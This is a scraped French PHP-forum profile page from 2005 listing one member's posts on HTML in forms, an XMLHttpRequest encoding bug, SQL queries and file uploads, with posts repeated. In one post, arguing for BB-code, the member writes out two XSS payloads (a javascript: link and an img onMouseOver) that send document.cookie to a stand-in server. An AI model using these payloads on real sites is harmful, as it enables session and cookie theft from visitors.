le 25/04/2005 à 13:55
html dans form
Parcontre ça peut être un très bon exercice pour les expressions régulières !!! 
A toi de voir !!!
A toi de voir !!!
Bzh
-
Nombre de sujets62
-
Nombre de messages1 503
-
Nombre de commentaires24
-
Nombre de newsAucune
-
Niveau en PHPDébutant
Ses derniers messages sur les forums
le 25/04/2005 à 13:49
html dans form
par exemple, tu vas bien être obligé d' accepter la balise '<a href="">Cliquez ici</a>'
Bon bin =>
<a href="javascript:window.location = 'http://ton_serveur/index.php?cookies='+document.cookie;">Cliquez ici</a>
Ou bien avec la balise img =>
<img src="adresse de l' image" onMouseOver="javascript:window.location = 'http://ton_serveur/index.php?cookies='+document.cookie;">*
Evidement que tu peux te protèger !!! Mais là ça se complique vraiment beaucoup !!!
Je te le redis, si le BB-code existe il y a bien une raison à cela !!!
Bye...
Bon bin =>
<a href="javascript:window.location = 'http://ton_serveur/index.php?cookies='+document.cookie;">Cliquez ici</a>
Ou bien avec la balise img =>
<img src="adresse de l' image" onMouseOver="javascript:window.location = 'http://ton_serveur/index.php?cookies='+document.cookie;">*
Evidement que tu peux te protèger !!! Mais là ça se complique vraiment beaucoup !!!
Je te le redis, si le BB-code existe il y a bien une raison à cela !!!
Bye...
le 25/04/2005 à 12:20
Objet XMLHttpRequest + erreur caractères
Merci, j' y avais pensé à encodé ma chaine...
Mais ce que je ne comprends pas, c' est que je suis en méthode POST !!!!
Donc, normalement, il ne devrait pas avoir besoin de coder la chaine à envoyer...
Merci de ton aide.
Mais ce que je ne comprends pas, c' est que je suis en méthode POST !!!!
Donc, normalement, il ne devrait pas avoir besoin de coder la chaine à envoyer...
Merci de ton aide.
le 25/04/2005 à 12:04
html dans form
Sincèrement !!!! La faille XSS peut être une faille très dangereuse si elle est bien utilisé !!!
Déja, faire un BB-code sans faille n' est pas facile !!!
Mais là encore pire... Je te souhaite bon courage...
ps: si le BB-code existe, c' est qu' il y a bien une raison...
Déja, faire un BB-code sans faille n' est pas facile !!!
Mais là encore pire... Je te souhaite bon courage...
ps: si le BB-code existe, c' est qu' il y a bien une raison...
le 25/04/2005 à 01:11
Pb de width ds un tableau
Utilise une fonction php pour insérer un espace dans les mots trop longs, ainsi, tu sauras protêgé contre les petits malins qui vondront défaire le design de ton site...
Ciao...
Ciao...
le 25/04/2005 à 01:07
PB dans un WHERE
Pour ton match, si rien ne s' affiche, es-tu sur de ta façon de gérer l' affichage ??? Parce que tu ne nous montre pas tout ton code... Le post requette aurait pu nous être utile !!!
Pour ce qui est d' ajouter une variable dans ta requette, tout dépend comment est construite ta requette...
Dans ton cas =>
Mais attention si ta requette est construite entre simple guillemet =>
Un conseil, si tu n' a à afficher, je te conseil de rajouter un "LIMIT 1" à la fin de te requette.
Ce qui donne =>
Ce n' est qu' un exemple écrit en deux minutes (pas faire copier-coller) pour te montrer...
Ciao...
Pour ce qui est d' ajouter une variable dans ta requette, tout dépend comment est construite ta requette...
Dans ton cas =>
<?php
$requette = " ta requette WHERE tennis_matchs.date_match > \"$date_jour\"";
?>
Mais attention si ta requette est construite entre simple guillemet =>
<?php
$requette = ' ta requette WHERE tennis_matchs.date_match > "'.$date_jour."';?>
Un conseil, si tu n' a à afficher, je te conseil de rajouter un "LIMIT 1" à la fin de te requette.
Ce qui donne =>
<?php
$req = mysql_query('SELECT tennis_matchs.id_match, tennis_tournois.nom_tournoi, tennis_tour.tour, tennis_matchs.date_match, tennis_matchs.heure_match, j1.nom_joueur AS joueur1, j2.nom_joueur AS joueur2, tennis_matchs.vainqueur
FROM tennis_matchs, tennis_tournois, tennis_joueurs AS j1, tennis_joueurs AS j2, tennis_tour
WHERE tennis_matchs.date_match > "'. date("Y-m-d").'"
AND j1.id_joueur = tennis_matchs.joueur1
AND j2.id_joueur = tennis_matchs.joueur2
AND tennis_tour.id_tour = tennis_matchs.id_tour
AND tennis_tournois.id_tournoi = tennis_matchs.id_tournoi LIMIT 1');
?>
Ce n' est qu' un exemple écrit en deux minutes (pas faire copier-coller) pour te montrer...
Ciao...
le 25/04/2005 à 00:56
Objet XMLHttpRequest + erreur caractères
Pitié !!!! Aidez-moi...
Vraiment personne ne peut m' aider ??? Les bon en Javscript là !!! Non ????
S' il vous plait !!! Sérieusement, je suis vraiment bloqué...
Vraiment personne ne peut m' aider ??? Les bon en Javscript là !!! Non ????
S' il vous plait !!! Sérieusement, je suis vraiment bloqué...
le 24/04/2005 à 11:27
Objet XMLHttpRequest + erreur caractères
Heu... Personne ne peut m' aider ??? 
Peut être que cela viendrait de l' entête ??? Non ???
Y a t' il une autre entête pour les envoies POST ???
Merci...
Ciao...
Peut être que cela viendrait de l' entête ??? Non ???
XhrObj.setRequestHeader('Content-Type','application/x-www-form-urlencoded');Y a t' il une autre entête pour les envoies POST ???
Merci...
Ciao...
le 24/04/2005 à 01:16
fichiers et php
Bonjours...
Je pense que cela pourrait t' aider un peu...
Bien évidement, il faudra l' adapter au format zip !!!
Donc oublier la partie réduction d' image et bien t' interresser seulement à la partie upload du fichier et sa copie vers son dossier de destination...
http://www.lephpfacile.com/howto/index.php?p=12
Ciao...
Je pense que cela pourrait t' aider un peu...
Bien évidement, il faudra l' adapter au format zip !!!
Donc oublier la partie réduction d' image et bien t' interresser seulement à la partie upload du fichier et sa copie vers son dossier de destination...
http://www.lephpfacile.com/howto/index.php?p=12
Ciao...
le 22/04/2005 à 21:14
Objet XMLHttpRequest + erreur caractères
Bonjours tout le monde...
Voila, comme d' habitude, je sêche encore sur un problème javascript !!! Et, oui...
Je suis entrain de créer un chat en javascript (oui je sais c' est pas recommandé)...
Et, pour cela, j' utilise l' objet XMLHttpRequest, qui permet d' envoyer et de récupérer des données sans recharger ça page !!!!
Et bin, je suis en méthode POST et pourtant si j' ai le malheure d' avoir un "à" dans mes données et bin il se transforme en "Ã" et je vous parle pas des "+" et des "&" qui eux disparaissent (bizard je suis en POST et non en GET)!!!
Je déspère...
Merci pour votre aide.
Ciao...
Voila, comme d' habitude, je sêche encore sur un problème javascript !!! Et, oui...
Je suis entrain de créer un chat en javascript (oui je sais c' est pas recommandé)...
Et, pour cela, j' utilise l' objet XMLHttpRequest, qui permet d' envoyer et de récupérer des données sans recharger ça page !!!!
function receiveData()
{
var page = "./chat/lecture_message.php";
if(document.all)
{
//Internet Explorer
var XhrObj = new ActiveXObject("Microsoft.XMLHTTP") ;
}//fin if
else
{
//Mozilla
var XhrObj = new XMLHttpRequest();
}//fin else
//définition de l'endroit d'affichage:
var content = document.getElementById("contenu");
//Ouverture du fichier en methode POST
XhrObj.open("POST", page);
//Ok pour la page cible
XhrObj.onreadystatechange = function()
{
if (XhrObj.readyState == 4 && XhrObj.status == 200)
content.innerHTML += XhrObj.responseText ;
if( XhrObj.responseText != "" ){content.scrollTop=content.scrollHeight-content.clientHeight;}
}
XhrObj.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
XhrObj.send(null);
clearTimeout(timer);
timer = setTimeout('receiveData();',3000);
}//fin fonction SendData
/**
* Permet de récupérer les données d'un fichier via les XmlHttpRequest:
*/
Et bin, je suis en méthode POST et pourtant si j' ai le malheure d' avoir un "à" dans mes données et bin il se transforme en "Ã" et je vous parle pas des "+" et des "&" qui eux disparaissent (bizard je suis en POST et non en GET)!!!
Je déspère...
Merci pour votre aide.
Ciao...
